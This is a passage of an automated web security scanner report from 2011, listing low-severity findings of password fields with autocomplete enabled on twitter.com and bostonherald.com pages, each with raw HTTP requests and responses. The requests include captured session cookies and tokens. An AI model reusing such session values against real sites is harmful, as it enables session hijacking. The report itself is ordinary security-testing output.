Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224919-86126-59712
ETag: "072bd7c69249b014a8eea541d0e13ce7"
Last-Modified: Fri, 28 Jan 2011 14:28:39 GMT
X-Runtime: 0.46070
Content-Type: text/html; charset=utf-8
Content-Length: 51273
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIh9odHRwOi8vdHdpdHRlci5jb20vd2ViYW5keToM%250AY3NyZl9pZCIlMzU4ODlhZDFhNTVmNjY2ODliNTc5MzYzYjlkMzVmNjc6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--69ca8ae41a9f970b1732fe7d2a927b6f2859758a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="3d45d9efe81a9ee367be313616732f66b40549b5" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.139. http://twitter.com/zonajones

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /zonajones

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /zonajones HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265977-81164-11891
ETag: "18ef6945dbad6fc926ced7c8559a729e"
Last-Modified: Sat, 29 Jan 2011 01:52:57 GMT
X-Runtime: 0.01559
Content-Type: text/html; charset=utf-8
Content-Length: 47763
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.140. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:20:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 79220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.141. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:11:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.142. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 99426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.143. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:09:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.144. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.145. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.146. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 98783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.147. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.148. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
